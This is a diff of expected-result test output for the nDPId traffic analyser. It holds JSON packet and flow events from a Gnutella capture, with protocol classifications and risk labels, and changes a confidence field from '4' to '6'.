00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3103,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":2,"flow_last_seen":192907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192907,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0J3gAAIARnXEKAAIPKfk\/yHAJWDYAIGDxR05EED8+AQFUC1FLUlAGUk5BXS\/iNQlw"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3104,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":192907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192907,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0H4EAAIARbHsKAAIPTB5WkHAJ0j0AIK37R05EED8\/AQFUC1FLUlAGUk5BXS\/iNQlw"} @@ -1410,75 +1410,75 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":192908,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192908,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0s0sAAIARB+8KAAIPrGHHDnAJGMoAIJamR05EED9GAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3112,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":3,"flow_last_seen":192908,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192908,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0jJQAAIARUAcKAAIPp3KqnHAJXSQAIHOsR05EED9HAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":192908,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192908,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0770AAIARtrQKAAIPpanijnAJGMoAIIHcR05EED9IAQFUC1FLUlAGUk5BXS\/iNQlw"} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":200000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":12876,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":200000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":200000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":200000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":12876,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":200000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":200000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74329,"flow_last_seen":74396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1102,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":200000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":13092,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":15285,"flow_last_seen":21297,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72264,"flow_last_seen":72720,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":954,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74329,"flow_last_seen":74396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1102,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":200000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":13092,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":15285,"flow_last_seen":21297,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72264,"flow_last_seen":72720,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":954,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":63001,"flow_last_seen":78562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74327,"flow_last_seen":74692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1108,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72907,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1105,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":22405,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":12827,"flow_last_seen":41755,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":966,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00783{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":16487,"flow_last_seen":192636,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":15284,"flow_last_seen":23969,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1601,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00672{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":21843,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":12461,"flow_last_seen":75501,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":637,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90746,"flow_last_seen":90799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":22405,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":90746,"flow_last_seen":91392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3761,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 